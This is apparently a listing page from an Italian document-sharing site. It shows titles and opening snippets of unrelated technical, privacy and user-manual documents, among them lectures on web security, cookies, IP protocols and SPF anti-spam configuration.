DettagliScaletta. Estensioni UML per il Web. Applicazioni web - 2. Applicazioni web. WAE: Web Application Extension for UML. «Client page»
Scaletta Estensioni UML per il Web Michele Zennaro 14-05-2004 Le applicazioni web Scopo di un estensione UML per il web Due punti di vista Uno più astratto Uno più vicino ai file fisici conclusivo Commenti
DettagliPSNET UC RUPAR PIEMONTE MANUALE OPERATIVO
Pag. 1 di 17 VERIFICHE E APPROVAZIONI VERSIONE V01 REDAZIONE CONTROLLO APPROVAZIONE AUTORIZZAZIONE EMISSIONE NOME DATA NOME DATA NOME DATA PRATESI STATO DELLE VARIAZIONI VERSIONE PARAGRAFO O DESCRIZIONE
DettagliCollegamento remoto vending machines by do-dots
Collegamento remoto vending machines by do-dots Ultimo aggiornamento 23 marzo 2011 rev1 - Stesura iniziale 18/10/2010 rev2 - Approfondimenti 12/11/2010 rev3 Riduzione dei contenuti per una lettura generica
DettagliAlfa Layer S.r.l. Via Caboto, 53 10129 Torino ALFA PORTAL
ALFA PORTAL La struttura e le potenzialità della piattaforma Alfa Portal permette di creare, gestire e personalizzare un Portale di informazione in modo completamente automatizzato e user friendly. Tramite
DettagliRiccardo Dutto, Paolo Garza Politecnico di Torino. Riccardo Dutto, Paolo Garza Politecnico di Torino
Integration Services Project SQL Server 2005 Integration Services Permette di gestire tutti i processi di ETL Basato sui progetti di Business Intelligence di tipo Integration services Project SQL Server
Dettagli1. ACCESSO AL PORTALE easytao
1. ACCESSO AL PORTALE easytao Per accedere alla propria pagina personale e visualizzare la prescrizione terapeutica si deve possedere: - un collegamento ad internet - un browser (si consiglia l utilizzo
DettagliUtilizzo dei Cookie Cosa sono i cookie? A cosa servono i cookie? cookie tecnici cookie, detti analitici cookie di profilazione
Utilizzo dei Cookie Questo sito utilizza i cookie. Utilizzando il nostro sito web l'utente accetta e acconsente all utilizzo dei cookie in conformità con i termini di uso dei cookie espressi in questo
DettagliPosta Elettronica. Comunicare con e-mail. Definizione di e-mail. Def) La posta elettronica è un metodo di trasmissione dei messaggi tramite Internet:
Posta Elettronica Comunicare con e-mail Definizione di e-mail Def) La posta elettronica è un metodo di trasmissione dei messaggi tramite Internet: serve a comunicare per iscritto con gli altri utenti della
DettagliDal protocollo IP ai livelli superiori
Dal protocollo IP ai livelli superiori Prof. Enrico Terrone A. S: 2008/09 Protocollo IP Abbiamo visto che il protocollo IP opera al livello di rete definendo indirizzi a 32 bit detti indirizzi IP che permettono
DettagliInformativa ex art. 13 D.lgs. 196/2003
Informativa ex art. 13 D.lgs. 196/2003 Gentile Utente, l Hotel Eurolido (di seguito, Società ) rispetta e tutela la Sua privacy. Ai sensi dell art. 13 del Codice della Privacy (d.lgs. 196 del 30 giugno
DettagliEXPLOit Content Management Data Base per documenti SGML/XML
EXPLOit Content Management Data Base per documenti SGML/XML Introduzione L applicazione EXPLOit gestisce i contenuti dei documenti strutturati in SGML o XML, utilizzando il prodotto Adobe FrameMaker per
Dettaglib) Dinamicità delle pagine e interattività d) Separazione del contenuto dalla forma di visualizzazione
Evoluzione del Web Direzioni di sviluppo del web a) Multimedialità b) Dinamicità delle pagine e interattività c) Accessibilità d) Separazione del contenuto dalla forma di visualizzazione e) Web semantico
DettagliEsercitazione. Formato di compitini e compiti: domande ed esercizi "closed book" G. Ferrari - Reti di calcolatori.
Esercitazione Formato di compitini e compiti: domande ed esercizi "closed book" Esercitazione - 1 Domanda 1 In una comunicazione di rete tra due host, quale è il client e quale è il server. Necessario:
DettagliLezione 1 Introduzione
Lezione 1 Introduzione Ingegneria dei Processi Aziendali Modulo 1 Servizi Web Unità didattica 1 Protocolli Web Ernesto Damiani Università di Milano I Servizi Web Un Servizio Web è un implementazione software
DettagliEmail marketing ed invio newsletter. Invio di messaggi vocali personalizzati
Sistema online professionale per gestire il tuo mailing Email marketing ed invio newsletter SMS marketing Invio massivo di fax Invio di lettere cartacee (prioritaria o raccomandata) Invio di messaggi vocali
DettagliCookie (1) - Componenti
Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Chiara Braghin chiara.braghin@unimi.it! Cookie (1) - Componenti 4 componenti: 1) cookie nell header del messaggio HTTP response
DettagliElementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection
Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Chiara Braghin chiara.braghin@unimi.it! Cookie (1) - Componenti 4 componenti: 1) cookie nell header del messaggio HTTP response
DettagliIntroduzione all elaborazione di database nel Web
Introduzione all elaborazione di database nel Web Prof.ssa M. Cesa 1 Concetti base del Web Il Web è formato da computer nella rete Internet connessi fra loro in una modalità particolare che consente un
Dettagli2015 PERIODO D IMPOSTA
Manuale operativo per l installazione dell aggiornamento e per la compilazione della Certificazione Unica 2015 PERIODO D IMPOSTA 2014 società del gruppo Collegarsi al sito www.bitsrl.com 1. Cliccare sul
DettagliSETEFI. Marco Cantarini, Daniele Maccauro, Domenico Marzolla. 19 Aprile 2012
e VIRTUALCARD 19 Aprile 2012 e VIRTUALCARD Introduzione Il nostro obiettivo é quello di illustrare la struttura e le caratteristiche di fondo che stanno alla base delle transazioni online operate tramite
DettagliBenvenuti. Luca Biffi, Supporto Tecnico Achab supporto@achab.it
Benvenuti Luca Biffi, Supporto Tecnico Achab supporto@achab.it DriveLock: bloccare le applicazioni indesiderate Agenda 3 semplici domande Application control di DriveLock Confronto con Windows 7 Conclusioni
DettagliManuale LiveBox WEB ADMIN. http://www.liveboxcloud.com
2014 Manuale LiveBox WEB ADMIN http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa
DettagliConsiglio regionale della Toscana. Regole per il corretto funzionamento della posta elettronica
Consiglio regionale della Toscana Regole per il corretto funzionamento della posta elettronica A cura dell Ufficio Informatica Maggio 2006 Indice 1. Regole di utilizzo della posta elettronica... 3 2. Controllo
DettagliSiti web centrati sui dati (Data-centric web applications)
Siti web centrati sui dati (Data-centric web applications) 1 A L B E R T O B E L U S S I A N N O A C C A D E M I C O 2 0 1 2 / 2 0 1 3 WEB La tecnologia del World Wide Web (WWW) costituisce attualmente
DettagliINFORMATIVA SUL DIRITTO ALLA PRIVACY PER LA CONSULTAZIONE DEL SITO WEB www.arlatighislandi.it
INFORMATIVA SUL DIRITTO ALLA PRIVACY PER LA CONSULTAZIONE DEL SITO WEB www.arlatighislandi.it redatto ai sensi del decreto legislativo n 196/2003 2 GENNAIO 2014 documento pubblico 1 PREMESSA 3 SEZIONE
DettagliGara con presentazione di offerta valutata secondo il criterio dell offerta economicamente più vantaggiosa (gara in due tempi)
Gara con presentazione di offerta valutata secondo il criterio dell offerta economicamente più vantaggiosa (gara in due tempi) Manuale per i Fornitori INDICE DEGLI ARGOMENTI 1 DEFINIZIONI... 3 2 ACCESSO
DettagliDatabase e reti. Piero Gallo Pasquale Sirsi
Database e reti Piero Gallo Pasquale Sirsi Approcci per l interfacciamento Il nostro obiettivo è, ora, quello di individuare i possibili approcci per integrare una base di dati gestita da un in un ambiente
DettagliCombattere lo spam con MDaemon e SPF
MDaemon Combattere lo spam con MDaemon e SPF Abstract... 2 Cos è SPF... 2 Configurazione di SPF in MDaemon... 3 Attivare SPF in MDaemon 7... 3 Attivare SPF in MDaemon 8... 4 Attivare SPF in MDaemon 9...
DettagliGUIDA ALL ACQUISTO DELLE FOTO
1 GUIDA ALL ACQUISTO DELLE FOTO Gentile Utente questa guida vuole offrirle un aiuto nella selezione e nell acquisto delle foto dal nostro carrello elettronico. La invitiamo a Stampare questo breve manuale
DettagliElementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin
Elementi di Sicurezza e Privatezza Lezione 13 Web Security Chiara Braghin Cookie e Sicurezza HTTP e i cookie (1) Vi ricordate? I Web server in genere sono stateless: una serie di richieste dallo stesso
DettagliElementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin. Cookie e Sicurezza
Elementi di Sicurezza e Privatezza Lezione 13 Web Security Chiara Braghin Cookie e Sicurezza 1 HTTP e i cookie (1) Vi ricordate? I Web server in genere sono stateless: una serie di richieste dallo stesso
DettagliSOSEBI PAPERMAP2 MODULO WEB MANUALE DELL UTENTE
SOSEBI PAPERMAP2 MODULO WEB MANUALE DELL UTENTE S O. S E. B I. P R O D O T T I E S E R V I Z I P E R I B E N I C U L T U R A L I So.Se.Bi. s.r.l. - via dell Artigianato, 9-09122 Cagliari Tel. 070 / 2110311
DettagliI cookie sono classificati in base alla durata e al sito che li ha impostati.
1. Informativa sui cookie 1.1. Informazioni sui cookie I siti Web si avvalgono di tecniche utili e intelligenti per aumentare la semplicità di utilizzo e rendere i siti più interessanti per ogni visitatore.
DettagliManuale Utente Albo Pretorio GA
Manuale Utente Albo Pretorio GA IDENTIFICATIVO DOCUMENTO MU_ALBOPRETORIO-GA_1.4 Versione 1.4 Data edizione 04.04.2013 1 TABELLA DELLE VERSIONI Versione Data Paragrafo Descrizione delle modifiche apportate
DettagliLa prima applicazione Java. Creazione di oggetti - 1. La prima applicazione Java: schema di esecuzione. Gianpaolo Cugola - Sistemi Informativi in Rete
La prima applicazione Java Programma MyFirstApplication Il programma visualizza una finestra vuota sullo schermo. Importo il package delle classi usate nel seguito. Dichiaro la classe MyFirstApplication
DettagliSSO Specifiche Funzionali
SSO Specifiche Funzionali oggetto... : SSO Siti Istituzionali Class abbonamenti data ultimo aggiornamento... : 29/01/2014 N Data Descrizione Approvato da: 1.0 11-03-2013 Versione 1.0 Roberto Santosuosso
DettagliRealizzazione siti web. Protocolli Internet
Realizzazione siti web Protocolli Internet Argomenti del primo incontro Il concetto di I protocolli di Internet (in particolare ftp e http) Spazio pubblico e privato nel sito dell ITIS Memorizzazione di
Dettagli